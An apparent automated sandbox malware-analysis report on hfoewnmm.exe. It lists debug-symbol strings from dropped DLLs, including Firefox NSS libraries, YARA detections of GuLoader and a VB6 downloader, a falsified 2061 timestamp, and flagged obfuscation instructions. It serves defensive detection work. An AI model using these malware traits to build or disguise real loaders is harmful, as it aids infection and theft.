Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130202575.000000001FC44000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130295141.000000001FC54000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130986178.000000001FCF0000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr
Source: Binary string: msvcp140.i386.pdb source: hfoewnmm.exe, 00000005.00000003.2128903368.000000001E854000.00000004.00000001.sdmp, msvcp140.dll.5.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.5.dr
Source: Binary string: ucrtbase.pdbUGP source: hfoewnmm.exe, 00000005.00000003.2131995490.000000001FD20000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: hfoewnmm.exe, 00000005.00000003.2131902310.000000001F280000.00000004.00000001.sdmp, nssdbm3.dll.5.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130347616.000000001FC68000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.5.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130225554.000000001FC48000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130864345.000000001FCC4000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130962839.000000001FCEC000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr
            Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.5.dr
            Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.5.dr
            Source: Binary string: vcruntime140.i386.pdb source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
            Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130986178.000000001FCF0000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: hfoewnmm.exe, 00000005.00000003.2131902310.000000001F280000.00000004.00000001.sdmp, nssdbm3.dll.5.dr
            Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.5.dr
            Source: Binary string: msvcp140.i386.pdbGCTL source: hfoewnmm.exe, 00000005.00000003.2128903368.000000001E854000.00000004.00000001.sdmp, msvcp140.dll.5.dr
            Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2126896199.000000001FE38000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131037127.000000001FD10000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127011668.000000001FE38000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127758205.000000001FE38000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.5.dr

            Data Obfuscation:

            Yara detected GuLoader
            Source: Yara match | File source: Process Memory Space: hfoewnmm.exe PID: 2528, type: MEMORY
            Binary contains a suspicious time stamp
            Source: initial sample | Static PE information: 0xAC22BA81 [Thu Jul 7 10:18:41 2061 UTC]
            Yara detected VB6 Downloader Generic
            Source: Yara match | File source: Process Memory Space: hfoewnmm.exe PID: 2528, type: MEMORY
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0040544E push cs; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0040586B pushad ; iretd
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00403C00 push FFFFFFAAh; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0040543A push cs; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_004038D7 push ds; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0040594C push ds; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00402566 pushad ; iretd
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00402655 pushfd ; iretd
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00403AD0 push esi; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00404737 push ebx; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0040233B pushad ; iretd
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00402BD9 push ecx; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00403BDA push FFFFFFAAh; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00403BBD push edx; retf
            Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 5_3_1F2D850F pushfd ; ret